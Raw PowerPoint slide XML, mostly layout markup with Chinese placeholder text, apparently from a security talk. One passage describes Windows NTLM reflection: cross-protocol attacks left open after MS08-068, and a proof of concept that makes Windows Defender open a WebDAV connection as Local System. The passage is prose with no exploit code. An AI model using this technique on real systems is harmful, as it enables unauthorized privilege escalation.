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67" r:id="rId4"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="268" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="272" r:id="rId12"/>
    <p:sldId id="284" r:id="rId13"/>
    <p:sldId id="283" r:id="rId14"/>
    <p:sldId id="285" r:id="rId15"/>
    <p:sldId id="286" r:id="rId16"/>
    <p:sldId id="264" r:id="rId17"/>
    <p:sldId id="282" r:id="rId18"/>
    <p:sldId id="281" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="265" r:id="rId21"/>
    <p:sldId id="270" r:id="rId22"/>
    <p:sldId id="266" r:id="rId23"/>
    <p:sldId id="27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867" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-931"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NTLM reflection is a well known issue with Windows authentication. It’s typically abused in networked scenarios to reflect credentials from one machine to another. It used to be possible to reflect credentials back to the same machine but that was mitigated in MS08-068 by not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>honouring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> NTLM authentication sessions already in flight. However this did nothing to stop cross-protocol attacks. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>() You can tell it to initiate a scan of a file which gets opened under the local system token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>I’ve provided a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> which causes the Windows Defender service to open a WebDAV connection as Local System.</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837424" y="3803712"/>
            <a:ext cx="7200400" cy="656876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="28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3837424" y="4608576"/>
            <a:ext cx="5244600" cy="597408"/>
          </a:xfr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B68B81A-64DD-455E-AC40-261B0A63D2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90F8D7-809F-407E-9E77-E5A7269283FA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组合 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1176573" y="2680749"/>
            <a:ext cx="2514960" cy="1783826"/>
            <a:chOff x="1055440" y="3181142"/>
            <a:chExt cx="1584176" cy="1517334"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="泪滴形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1088861" y="3147721"/>
              <a:ext cx="1517334" cy="1584176"/>
            </a:xfrm>
            <a:prstGeom prst="teardrop">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3" name="泪滴形 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1339128" y="3399918"/>
              <a:ext cx="1267254" cy="1323079"/>
            </a:xfrm>
            <a:prstGeom prst="teardrop">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="69804"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>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4" name="泪滴形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1677425" y="3738215"/>
              <a:ext cx="936248" cy="977492"/>
            </a:xfrm>
            <a:prstGeom prst="teardrop">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="69804"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ct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solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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B68B81A-64DD-455E-AC40-261B0A63D2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90F8D7-809F-407E-9E77-E5A7269283FA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="454724"/>
            <a:ext cx="10515600" cy="5726620"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="225"/>
              </a:spcAft>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="527050" indent="-257175">
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="225"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="225"/>
              </a:spcAft>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="225"/>
              </a:spcAft>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="225"/>
              </a:spcAft>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2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="KSO_BC1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1500" b="0"/>
            </a:lvl2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7" name="日期占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4B68B81A-64DD-455E-AC40-261B0A63D26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90F8D7-809F-407E-9E77-E5A7269283F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778384" y="3010368"/>
            <a:ext cx="5219056" cy="853200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="108000" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="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65042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8" name="MH_Title"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4777059" y="3008848"/>
            <a:ext cx="5220381" cy="8530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8100"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lvl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4B68B81A-64DD-455E-AC40-261B0A63D2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90F8D7-809F-407E-9E77-E5A7269283FA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="MH_Others_1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2607581" y="3140456"/>
            <a:ext cx="2167521" cy="721457"/>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chemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="252000" bIns="0" anchor="ctr">
            <a:no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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>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838200" y="213920"/>
            <a:ext cx="10515600" cy="796011"/>
          </a:xfr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838200" y="1244602"/>
            <a:ext cx="5080000" cy="4932363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="269875" indent="135255">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000"/>
            </a:lvl2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KSO_BC2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6259684" y="1244602"/>
            <a:ext cx="5094116" cy="4932363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="269875" indent="135255">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000"/>
            </a:lvl2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5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4B68B81A-64DD-455E-AC40-261B0A63D2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90F8D7-809F-407E-9E77-E5A7269283F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日期占位符 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4B68B81A-64DD-455E-AC40-261B0A63D26F}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="页脚占位符 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="灯片编号占位符 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2C90F8D7-809F-407E-9E77-E5A7269283FA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="椭圆 19"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278821" y="2315370"/>
            <a:ext cx="2969681" cy="2227261"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="127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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="直接连接符 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4852697" y="2503469"/>
            <a:ext cx="0" cy="18916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标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5294443" y="2550491"/>
            <a:ext cx="5528965" cy="613459"/>
          </a:xfrm>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4800" b="0" cap="none" spc="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="6E747A">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编辑标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547200" y="3610800"/>
            <a:ext cx="2217600" cy="306000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>添加副标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8144000" y="3610800"/>
            <a:ext cx="2769600" cy="306000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="just" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFE89F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFE89F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>添加副标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="内容占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5585600" y="4089600"/>
            <a:ext cx="2184000" cy="306000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="just" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFE89F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFE89F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>添加副标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="内容占位符 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8144000" y="4089600"/>
            <a:ext cx="2769600" cy="306000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="just" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFE89F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFE89F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>添加副标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="KSO_Shape"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5322943" y="3668398"/>
            <a:ext cx="293549" cy="241537"/>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solidFill>
                <a:srgbClr val="5DD8F9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="KSO_Shape"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7870825" y="3694048"/>
            <a:ext cx="310649" cy="164587"/>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rgbClr val="5DD8F9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="KSO_Shape"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7862276" y="4151470"/>
            <a:ext cx="316347" cy="20733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rgbClr val="5DD8F9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="KSO_Shape"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5294443" y="4142920"/>
            <a:ext cx="327749" cy="222299"/>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rgbClr val="5DD8F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68B81A-64DD-455E-AC40-261B0A63D26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90F8D7-809F-407E-9E77-E5A7269283F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836347" y="553776"/>
            <a:ext cx="10517453" cy="795600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="KSO_BC1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1545312"/>
            <a:ext cx="4934400" cy="4237200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>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dirty="0" smtClean="0"/>
              <a:t>单击图标添加图片</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="KSO_BC2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
